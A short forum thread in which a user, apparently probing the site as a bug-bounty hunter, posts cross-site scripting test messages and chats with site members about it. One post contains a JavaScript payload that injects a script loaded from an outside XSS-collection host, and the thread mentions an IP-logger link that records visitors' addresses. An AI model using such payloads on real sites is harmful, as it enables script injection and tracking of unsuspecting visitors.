Testtest for xss from hackerone

z3r0xsec · June 11, 2020, 5:50am

testing from hackerone

z3r0xsec · June 11, 2020, 5:50am

z3r0xsec · June 11, 2020, 5:53am

javascript:eval(‘var a=document.createElement('script');a.src='https://a5h.xss.ht';document.body.appendChild(a)’)

z3r0xsec · June 11, 2020, 5:53am

z3r0xsec · June 11, 2020, 6:21am

Chris · June 11, 2020, 6:23am

Nice; did you find any vulnerabilities?

z3r0xsec · June 11, 2020, 6:27am

still no but i can get ip who visit my page are you from status.im?

Chris · June 11, 2020, 6:28am

Yeah, I’m tidus.eth on Status.

z3r0xsec · June 11, 2020, 6:30am

got it nice to meet you

z3r0xsec · June 11, 2020, 6:31am

Chris · June 11, 2020, 6:31am

Likewise! Haha I see you trying to fetch https://iplogger.org/1bzX47

z3r0xsec · June 11, 2020, 6:32am

yes iam checking i can hide any payload to do something

Chris · June 11, 2020, 6:34am

I generally block XSS by injecting headers through my Web server across everything I host (Caddy makes this super easy), then relaxing them per subdomain as needed or if I see errors in the console for whatever.

z3r0xsec · June 11, 2020, 6:35am

cool okay i will try other vulnerability test

Chris · June 11, 2020, 6:36am

Best of luck! Thanks for the white hat work.

z3r0xsec · June 11, 2020, 6:36am

thanks for chat chris i try my best

henrystats · June 11, 2020, 4:53pm

welcome :)))))))))))))